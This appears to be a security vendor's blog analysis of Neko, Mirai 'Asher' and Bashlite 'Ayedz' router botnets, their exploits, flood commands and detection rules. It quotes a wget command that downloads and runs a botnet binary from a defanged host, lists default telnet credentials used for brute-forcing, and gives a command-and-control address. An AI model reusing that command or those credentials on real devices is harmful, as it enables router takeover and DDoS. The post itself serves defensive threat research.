web analytics

Back-to-Back Campaigns: Neko, Mirai, and Bashlite Malware Variants Use Various Exploits to Target Several Routers, Devices

By Augusto Remillano II and Jakub Urbanec

Within a span of three weeks, our telemetry uncovered three notable malware variants of Neko, Mirai, and Bashlite. On July 22, 2019, we saw and started analyzing a Neko botnet sample, then observed another sample with additional exploits the following week.  A Mirai variant that calls itself “Asher” surfaced on July 30, then a Bashlite variant called “Ayedz” the following week. These malware variants enlist infected routers to botnets that are capable of launching distributed denial of service (DDoS) attacks.

Neko

On July 22, our honeypots detected a botnet sample, x86.neko (detected by Trend Micro as Backdoor.Linux.NEKO.AB), that brute-forces weak credentials. It then issues the following commands:

“cd /tmp/; wget hxxp://185.244.25.200/bins/x86.neko; chmod 777 x86.neko; ./x86.neko”

Our research indicates that this botnet has versions for various processor architectures.

Upon analysis, we discovered that the Neko botnet is capable of executing several backdoor commands:  it can execute shell commands as well as launch user datagram protocol or UDP and UPD-HEX flood attacks, inundating a router’s ability to properly process and respond to information.

It is also capable of killing processes (the killerfunction is found in its body). Neko also holds within it an extensive kill list of other malware-related processes that it will terminate.

Further examination of the Neko botnet code shows that it comes with scanners that are capable of looking for multiple exploits that would allow the malware to propagate itself to other vulnerable devices:

Aside from the abovementioned exploits, we observed that the Neko botnet also scans for vulnerable Africo devices. We are are unable to determine which Africo device Neko scans for, and we noted that it does not seem to be linked to any specific exploit. However, we noticed that this vulnerability structure is similar to Netgear DGN1000 / DGN2200, an unauthenticated RCE on Netgear DGN devices.

Figure 1. Neko botnet code showing how it scans for Africo devices

On July 29, our honeypots collected an updated Neko botnet sample (detected by Trend Micro as Backdoor.Linux.NEKO.AC). This time, the file is now UPX-packed with its magic number (UPX!) tampered, in an attempt to prevent the botnet from being unpacked.

Figure 2. UPX-packed Neko botnet code with an altered magic number

We discovered that this new botnet sample has an expanded scanner function and uses additional exploits for propagation. Interestingly, the list of exploits now includes the Netgear DGN1000 / DGN2200 — the vulnerability that shares a similar structure as the Africo scan.

Figure 3. Neko botnet code showing how it scans for Netgear DGN1000 / DGN2200

The updated version of the Neko botnet also scans for multiple CCTV-DVR vendors and Netgear R7000 and R6400 routers (2016-6277).

Figures 4 and 5. Neko botnet code showing how it scans for a variety of CCTV-DVR exploits and Netgear R7000 and R6400 routers

 

This Neko variant also scans for “awsec”, which has a similar vulnerability structure as that of the Vacron NVR RCE.

Figure 6. Neko botnet code showing how it scans for “awsec”

In addition, the Neko botnet also attempts to scan for “cisco” and “wap54g. however, based on our analysis, both commands are unable to successfully exploit any vulnerability. “Cisco” appears to be attempting to use CVE-2018-15379,  wherein the HTTP web server for Cisco Prime Infrastructure has unrestricted directory permission, allowing RCE. However, the payload does not use the correct URI path, hence the vulnerability is not exploited.

Figure 7. Neko botnet code showing how it scans for “cisco”

Meanwhile, the wap54g payload’s HTTP headers and message body were improperly formatted, which may have caused the attempt to exploit the Linksys WAP54Gv3 Remote Debug Root Shell vulnerability to fail.

Figure 8. Neko botnet code showing how it scans for “wap54g”

Mirai variant “Asher”

On July 30, our telemetry revealed another router malware — a Mirai variant (detected by Trend Micro as Backdoor.Linux.MIRAI.VWIRC). Typical of Mirai, this variant infects devices with a BusyBox, which is a software suite for devices with limited resources. It first checks for BusyBox presence by executing the “/bin/busybox {any string}” command.  If the device’s system responds with “{any string} applet not found,” the bot will proceed with its operation. The malware variant’s authors used the {any string} part to “name” the malware; in this case, they used “Asher.”

Figure 9. Screenshot showing the command that checks for the presence of a BusyBox

The “Asher” variant can infiltrate routers by brute-forcing its way in using the following telnet login credentials:

  • 12345
  • 2011vsta
  • 2601hx
  • 4321
  • admin
  • daemon
  • default
  • guest
  • OxhlwSG8
  • pass
  • password
  • root
  • S2fGqNFs
  • support D13hh[
  • synnet
  • t0talc0ntr0l4!
  • taZz@23495859
  • tlJwpbo6
  • vizxv
  • xc3511

We discovered that Asher propagates by scanning for the following router exploits. We also saw that it shares two similar exploits with Neko:

Figure 10. The exploits Asher botnet scans for

Figure 11. Code showing how the Asher botnet scans for DVRs with the MVPower Shell Command Execution vulnerability

Figure 12. Code showing how the Asher botnet scans for CVE-2014-8361

Figure 13. Code showing how the Asher botnet scans for CVE-2018-10561 and CVE-2018-10562

Bashlite variant “Ayedz”

On August 6, our telemetry pointed to a botnet sample of yet another router malware, this time, a Bashlite variant that seems to refer to itself as “Ayedz” (detected by Trend Micro as Backdoor.Linux.BASHLITE.SMJC, Backdoor.Linux.BASHLITE.SMJC8, and Backdoor.Linux.BASHLITE.SMJC4), based on this malware’s file name. Upon execution, Ayedz will send the following information about the infected device back to the host IP address 167[.]71[.]7[.]231 via port 46216:

Figure 14. The commands used by Bashlite variant Ayedz to send information back to its host

  • Device – its “getDevice” function returns an “SSH” string if there is a file present in “/usr/sbin/telnetd”, otherwise, it returns with an “Uknown Device” string
  • Files – if the device has any of the following files:
    • /usr/bin/python
    • /usr/bin/python3
    • /usr/bin/perl
  • Linux distribution or distro – when the infected device’s Linux distro is openSUSE, Red Hat Enterprise Linux (REHL), CentOS, Gentoo Linux, Ubuntu, Debian, or unknown
  • Port – its getPorz function returns a “22” string if the four abovementioned files are found; otherwise, it returns with an “Uknown Device” string

Analysis of this Ayedz sample revealed that it is capable of running several backdoor commands for launching DDoS attacks. We also observed that Ayedz features several attack/flood options as well as other commands to its operators, such as:

  • CLOUDFLARE – HTTP flood with CloudFlare protection bypass
  • CNC – set command and control
  • HTTP – HTTP Flood
  • RAID – STD + TCP Flood
  • STD – STD flood
  • STOMP – STD + UDP Flood
  • STOP – Stop bot operation
  • TCP – TCP SYN flood
  • UDP – UDP flood
  • UPDATE – downloaded updated binary from C&C

Securing routers against threats like Neko, Mirai, and Bashlite

Although manufacturers play important roles in securing routers and other devices, users and businesses can adopt good security practices to defend against threats like Mirai, Neko, and Bashlite:

  • Choosing a reliable manufacturer that consistently patches its products
  • Regularly updating the device’s (e.g., routers) firmware and software as well as credentials used to access it
  • Encrypting and securing the connections that devices use
  • Configuring the router to make them more resistant to intrusions
  • Disabling outdated or unnecessary components in devices and using only legitimate applications via trusted sources.
  • Deploying tools that provide additional security to home networks and devices connected to them.

Trend Micro solutions

Trend Micro Smart Home Network protects customers from the aforementioned exploits through these rules:

1133255WEB Remote Command Execution in XML -1
1059669WEB D-Link Multiple Routers HNAP Protocol Security Bypass Vulnerability (BID-37690)
1134287WEB Huawei Home Gateway SOAP Command Execution (CVE-2017-17215)
1134610
1134611
1134891
1134892
WEB Dasan GPON Routers Command Injection -1.1 (CVE-2018-10561)
WEB Dasan GPON Routers Command Injection -1.2 (CVE-2018-10561)
WEB Dasan GPON Routers Command Injection -1.3 (CVE-2018-10561)
WEB Dasan GPON Routers Command Injection -1.4 (CVE-2018-10561)
1058632
1054456
1054457
EXPLOIT Linksys E-series Unauthenticated Remote Code Execution Exploit (EDB-31683)
WEB Linksys Unauthenticated Remote Code Execution -1 (OSVDB-103321)
WEB Linksys Unauthenticated Remote Code Execution -2 (OSVDB-103321)
1133498WEB Remote Command Execution via Shell Script -1.u
1135215WEB ThinkPHP Remote Code Execution
1134286WEB Realtek SDK Miniigd UPnP SOAP Command Execution (CVE-2014-8361)
1133498WEB Remote Command Execution via Shell Script -1.u
1134286WEB Realtek SDK Miniigd UPnP SOAP Command Execution (CVE-2014-8361)
1134610
1134611
1134891
1134892
WEB Dasan GPON Routers Command Injection -1.1 (CVE-2018-10561)
WEB Dasan GPON Routers Command Injection -1.2 (CVE-2018-10561)
WEB Dasan GPON Routers Command Injection -1.3 (CVE-2018-10561)
WEB Dasan GPON Routers Command Injection -1.4 (CVE-2018-10561)

Trend Micro ™ Deep Discovery ™ Inspector protects customers from the mentioned exploits through these rules:

Neko

PayloadRule
NetgearOfficial Rule 2547: NETGEAR DGN1000/DGN2200 Remote Code Execution – HTTP (Request)
NetgearR7064Official Rule 4103: Daemon DD-WRT Unauthenticated RCE Exploit – HTTP (Request)
CrosswebBeta Rule 3268: CCTV-DVR Remote Code Execution – HTTP (Request)
Official Rule 2485: CCTV-DVR Remote Code Execution – HTTP (Request)
CiscoOfficial Rule 2452: Wget Commandline Injection
Beta Rule 3269: CVE-2018-15379 Cisco Prime Infrastructure Remote Command Execution – HTTP (Request)
Official Rule 4168: CVE-2018-15379 Cisco Prime Infrastructure Remote Command Execution – HTTP (Request)
Awsec/VacronOfficial Rule 2543: VACRON Remote Code Execution Exploit- HTTP (Request)
WAP54GBeta Rule 3270: Linksys Remote Debug Root Shell- HTTP (Request)
Official Rule 4169: Linksys Remote Debug Root Shell- HTTP (Request)

Asher

REALTEKRule 2575: Command Injection via UPnP SOAP Interface – HTTP (Request)
JAWSRule 2544: JAWS Remote Code Execution Exploit – HTTP (Request), Rule 2639: CVE-2018-10562 – GPON Remote Code Execution – HTTP (Request)

Ayedz

LinuxBeta Rule 3272: BASHLITE – TCP (Request) – Beta

Official Rule 4180: BASHLITE – TCP (Request) 

The indicators of compromise (IoCs) are listed in an appendix.

The post Back-to-Back Campaigns: Neko, Mirai, and Bashlite Malware Variants Use Various Exploits to Target Several Routers, Devices appeared first on .